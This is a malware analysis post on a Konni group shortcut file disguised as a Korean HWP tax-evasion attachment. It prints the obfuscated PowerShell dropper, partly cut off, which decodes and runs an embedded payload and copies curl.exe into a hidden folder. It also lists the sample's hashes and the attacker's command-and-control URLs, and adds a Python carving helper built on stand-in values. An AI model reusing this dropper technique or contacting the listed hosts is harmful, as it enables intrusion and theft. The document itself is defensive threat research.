Konni malware disguised as a tax evasion tip: 첨부1_소명자료 목록(탈세제보)(2024.4.5)
Today we take a look at 첨부1_소명자료 목록(탈세제보)(2024.4.5), another piece of malware made by the North Korean hacking group Konni.
This malware is an lnk file dressed up as an HWP attachment (HWP being the document format of Hancom's Hangul word processor). If the victim takes it for an HWP document and runs it, the malware is set up to execute through PowerShell. First, the hash values of the malware are as follows.
File name: 첨부1_소명자료 목록(탈세제보).hwp.lnk
Size: 136 KB
MD5: 9d6c79c0b395cceb83662aa3f7ed0123
SHA-1: 65f5f7d127c478522e9669200de20000edcb6cfb
SHA-256: 2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
PowerShell code
c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQ(A)cjvWqTWLATHZCqoATzG (z)vpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESU RkbbEfWgcLVep(X)BQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHj uQNHCakQwkvfexCFsKuzAkzcXvpnd(N)HJbTQQnPxsGyzEJuYXSEMtbgHipKLg LYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodja bnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgEC(k0) dcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtS aeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxr BrsSqjZJHwfNQjydVdr(T)VcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmn GwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgb BFCaLZNMVAQjVBLRqGW(T)MdpheNRzqKXTtTzqKa(S)mkkTkTeqPo(u)YEonoypuVXim vkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBws KhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMk(s)SGUwHrgGnFGcAHKutaNdpAThEKYGN(a)ZxWa eruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGz wCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgV(A)KRaWkbbpPeRYizaNJbWzqALF fEn(b)cHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnm LaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden funct(i)on JogMjclR PK(){$zPedYniBf(y)=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-o bject{$_.length -eq 0(x)0002233E};$nJlRQzeAUMCXVjArUNw(=)$zPedYniBfy;$z PedYniBfy(=)$zPedYniBfy^(|)Select-Object -ExpandProperty (N)ame;if($zPe dYniBfy(.)length -eq 0){cd $env:TE(M)P;$zPedYniBfy=Get-ChildItem *.lnk ;$zP(e)dYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$n JlR(Q)zeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};func tion pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$z(P)edYniBfy=$dj(L)utZCNrS[0] ;$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPed YniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEo(T)XlI=JogMjc lR(P)K;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]: 
:new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[Sy( s)tem.IO.FileAcc(e)ss]::ReadWrite,[System.IO.FileShare]::None));try{$Cv ytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKL tldjopW=$CvytSiJOHD.ReadByte(s)(0x00006C00);}finally{$CvytSiJOHD.Close( )};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$f(K)LtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[Sys tem.IO.File]::WriteAllBytes($djLutZ(C)NrS,$fKLtldjopW);$oE(e)fgawPUH='. \'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQ aW;$WrKnPB(w)fdh=JogMjclRPK;remov(e)-item -path $WrKnPBwfdh[1] -force;& mkdir c:\GSlLzFnTov & attrib (+)h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov ( &) copy c:\windows\system32\curl(.)exe GSlLzFnTov(.)exe & GSlLzFnTov -k (-o …
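The script above finds its own .lnk by size (0x2233E bytes), seeks to 0x1DA5, reads 0x6C00 bytes, XORs each with 0xD8 and runs the result before copying curl.exe into a hidden folder. The following Python is added here and is not from the original post: it pulls those three parameters out of a .lnk and carves the decoded payload for offline analysis, so an analyst can inspect the dropped file without running the shortcut. The sample it builds, its offset (0x200), length (0x10) and payload bytes are constructed stand-ins, not the real sample's values.

```python
import re

# Parameters the dropper's PowerShell carries in clear text inside the .lnk:
# seek offset, byte count and single-byte XOR key. In the sample above they
# are Seek(0x00001DA5), ReadBytes(0x00006C00) and -bxor 0xD8.
SEEK_RE = re.compile(r"Seek\(0x([0-9A-Fa-f]+)")
READ_RE = re.compile(r"ReadBytes\(0x([0-9A-Fa-f]+)\)")
XOR_RE = re.compile(r"-bxor\s+0x([0-9A-Fa-f]+)")


def candidate_texts(lnk_bytes):
    """Yield the .lnk contents as text under the encodings the command line may use."""
    # StringData in a .lnk is UTF-16LE when the IsUnicode flag is set (the usual
    # case); its alignment depends on the preceding ID list, so try both parities.
    yield lnk_bytes.decode("latin-1")
    yield lnk_bytes.decode("utf-16-le", errors="ignore")
    yield lnk_bytes[1:].decode("utf-16-le", errors="ignore")


def extract_parameters(lnk_bytes):
    """Return (offset, length, key) parsed from the embedded script, or None."""
    for text in candidate_texts(lnk_bytes):
        text = text.replace("^", "")  # drop cmd caret escapes such as po^w^e^rs^he^l^l
        seek, read, xor = SEEK_RE.search(text), READ_RE.search(text), XOR_RE.search(text)
        if seek and read and xor:
            return int(seek.group(1), 16), int(read.group(1), 16), int(xor.group(1), 16)
    return None


def carve_payload(lnk_bytes):
    """Carve and XOR-decode the payload the script would drop, without executing it."""
    params = extract_parameters(lnk_bytes)
    if params is None:
        return None
    offset, length, key = params
    blob = lnk_bytes[offset:offset + length]
    if len(blob) != length:
        return None  # truncated sample: nothing reliable to decode
    return bytes(b ^ key for b in blob)


def build_sample():
    """Constructed stand-in for the real .lnk: a 0x4C-byte header, the dropper's
    seek/read/xor parameters as a UTF-16LE command line, and a 16-byte payload
    stored XOR 0xD8 at offset 0x200 (not the real sample's 0x1DA5/0x6C00)."""
    plain = b"MZ" + b"fake-payload!!"  # 16 bytes of made-up "dropped file"
    script = ("po^w^e^rs^he^l^l -windowstyle hidden $r.BaseStream.Seek(0x00000200,"
              "[System.IO.SeekOrigin]::Begin);$b=$r.ReadBytes(0x00000010);"
              "$b[$i]=$b[$i] -bxor 0xD8")
    body = b"L" + b"\x00" * 0x4B + script.encode("utf-16-le")
    body += b"\x00" * (0x200 - len(body))
    return body + bytes(c ^ 0xD8 for c in plain) + b"\x00" * 32, plain
```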
IoC
2189aa5be8a01bc29a314c3c3803c2b8131f49a84527c6b0a710b50df661575e
65f5f7d127c478522e9669200de20000edcb6cfb
9d6c79c0b395cceb83662aa3f7ed0123
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0
https://jethropc.com/wp-admin/css/temp/hurry/?rv=pap
https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1